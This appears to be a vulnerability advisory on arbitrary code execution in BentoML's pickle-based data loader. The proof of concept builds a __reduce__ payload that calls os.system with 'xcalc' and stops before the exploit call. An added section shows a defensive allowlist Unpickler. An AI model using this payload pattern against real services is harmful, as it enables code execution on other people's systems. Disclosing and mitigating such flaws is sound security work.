vulnerability arbitrary code execution
severity 3.8
language python
registry pypi


BentoML is a framework for serving, managing, and deploying machine learning models. It aims to bridge the gap between Data Science and DevOps, and to enable teams to deliver prediction services in a fast, repeatable, and scalable way.

  • Vulnerability description: untrusted data is loaded with the pickle.load function, leading to arbitrary code execution.

Proof of Concept

  1. run
import os
import pickle
os.system('pip install bentoml')
from bentoml.marshal.utils import PickleDataLoader
# payload formation: pickle calls __reduce__ and invokes the returned callable on load
class ArbitraryCode:
    def __reduce__(self):
        cmd = 'xcalc'
        return os.system, (cmd,)
# serializing payload
dumps = pickle.dumps(ArbitraryCode())
# exploiting bentoml
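The root cause above is that pickle resolves and calls whatever callable a payload's __reduce__ names. The mitigation pattern from the Python pickle documentation is a restricted Unpickler whose find_class only resolves an explicit allowlist. The following is an added illustration, not BentoML's code and not part of the original report; the DemoPayload class is a constructed stand-in that points its __reduce__ hook at os.getpid (harmless) instead of os.system, so the difference between stdlib pickle.loads and the restricted loader can be observed safely.

```python
import io
import os
import pickle

# Allowlist of globals an input payload may legitimately reference.
# Plain containers and scalars emit no globals under protocol 4+, but older
# protocols reference builtins.set / builtins.complex etc. by name.
SAFE_BUILTINS = frozenset({
    "dict", "list", "tuple", "set", "frozenset",
    "str", "bytes", "bytearray", "int", "float", "bool", "complex",
})


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global outside SAFE_BUILTINS.

    pickle resolves callables (os.system in the advisory's payload) through
    find_class before the REDUCE opcode invokes them, so raising here stops
    the call before any attacker-chosen code runs.
    """

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(__import__("builtins"), name)
        raise pickle.UnpicklingError(
            f"refusing to resolve global {module}.{name} in untrusted pickle"
        )


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads on untrusted bytes."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True if the restricted loader refuses the payload, False if it loads."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


class DemoPayload:
    """Constructed, harmless stand-in for the advisory's payload (hypothetical
    name): __reduce__ asks the unpickler to call os.getpid with no arguments."""

    def __reduce__(self):
        return os.getpid, ()


def build_demo_payload() -> bytes:
    return pickle.dumps(DemoPayload())


def build_benign_payload() -> bytes:
    # Constructed sample of the kind of data a prediction service expects.
    return pickle.dumps({"features": [0.1, 0.2], "label": "cat"})


def load_with_stdlib(data: bytes):
    """Unrestricted pickle.loads, i.e. the behaviour the advisory reports."""
    return pickle.loads(data)


if __name__ == "__main__":
    print("benign payload via restricted loader:", restricted_loads(build_benign_payload()))
    print("stdlib loads executed the callable, pid:", load_with_stdlib(build_demo_payload()))
    print("restricted loader rejected demo payload:", is_rejected(build_demo_payload()))
```

The check happens at global-resolution time, not after deserialization, which is why it works even for payloads that would otherwise run code before returning an object. Anything that needs richer types (numpy arrays, model objects) should extend the allowlist deliberately, module by module, rather than fall back to pickle.loads.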